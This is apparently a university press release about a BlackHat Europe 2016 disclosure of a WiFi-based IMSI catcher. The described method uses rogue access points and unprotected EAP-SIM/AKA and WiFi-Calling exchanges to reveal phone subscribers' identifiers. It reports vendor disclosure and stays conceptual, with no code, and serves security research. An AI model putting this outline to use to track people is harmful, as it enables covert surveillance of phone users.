Tracking anyone via mobile phone (WiFi-based IMSI Catcher)
Posted: 3rd November 2016
In a presentation today at BlackHat Europe, Oxford University Researchers Piers O’Hanlon and Ravishankar Borgaonkar report that they have discovered two significant privacy flaws in the currently deployed mobile networks, which would allow anyone to track a mobile phone with a minimum of cost and effort.
The flaws relate to the International Mobile Subscriber Identity (IMSI), which is a globally unique identifier stored on the SIM card. It identifies and allows for authentication of a mobile subscriber on the mobile network, and so is a significant and important private identifier, designed to be seen only by the mobile operator, and stored in their subscriber database.
An IMSI catcher is a piece of technology that allows for tracking of specific mobile subscribers based their IMSI - in a mobile phone, tablet, car or other mobile connected device. Previously, IMSI catchers have been built for specialist uses such as law enforcement. They operate in the highly-regulated licenced mobile spectrum.
The new approach uses different techniques, operating in the WiFi bands, which do not need a licence, enabling anyone to make an IMSI catcher using nothing more complex than an ordinary laptop, or any other WiFi device.
Using that laptop, and software based on an approach describedby the researchers, someone could set up a ‘rogue access point’ masquerading as a well-known auto WiFi network (such as the WiFi available in tube stations), and so lure smartphones in range to connect. Once connected the rogue AP extracts their IMSI.
The flaws exposed by the research are present in most of the current smartphones, but their exploitation depends upon their operator configuration. These flaws have now been reported to both the mobile OS companies (Apple, Google, Microsoft, and Blackberry) and the operators (GSMA). Researchers have been working with them to ensure the future protection of the IMSI, and as a result certain new features have been developed including the inclusion of enhanced privacy mechanisms (conservative peer mode for EAP-SIM/AKA) in Apple’s iOS10.
More Technical Details
The WiFi-based IMSI catcher developed by Piers and Ravishankar relies upon two flaws in the design and deployment of authentication protocols as specified by the 3GPP, which is the main mobile standards body. Specifically, these exist in two access methods specified in [TS 33.234], which both rely upon SIM-based authentication protocols, known as EAP-SIM and EAP-AKA.
The first method is used for access to secured ’Automatic’ (or IEEE 802.1X) WiFi networks, which have become widely deployed by many mobile operators, for example on the London Underground. The problem is that the EAP-SIM interaction is not encrypted and during the course of the protocol exchange the IMSI is revealed when then device first connects to the network so it may be passively observed. The researchers have developed an active attack which allows the IMSI to be forcibly revealed. The automatic connection is facilitated by pre-configured profiles which either get installed automatically or manually. These automatic profiles are provided by the mobile operators for use on iOS, Android and Windows phones.
The second method is utilised for the ’WiFi-Calling’ service which is deployed by a number of operators, and is growing in popularity. The issue with this method is that whilst the connection to the mobile operator’s edge packet data gateway (EPDG) is encrypted during the setup phase of the IP security (IPSec) protocol, unfortunately cryptographic certificates are not used to protect the IMSI exchange. This means that the exchange is susceptible to a man-in-the-middle attack and thus the IMSI may be revealed.
The newly developed approach provides for a new way to track subscribers, but it does not allow for call or data interception as is possible with some conventional IMSI catcher devices. It should also be noted that it is not straightforward to convert an IMSI to the corresponding telephone number as it requires access to the operator subscriber database.
Notes for Editors
For further information, please contact firstname.lastname@example.org
The work was undertaken as part of the 5G-ENSURE project (www.5GEnsure.eu), funded by the EU Framework Programme for Research and Innovation Horizon 2020 under grant agreement no. 671562.
Further information: https://www.blackhat.com/docs/eu-16/materials/eu-16-OHanlon-WiFi-IMSI-Catcher.pdf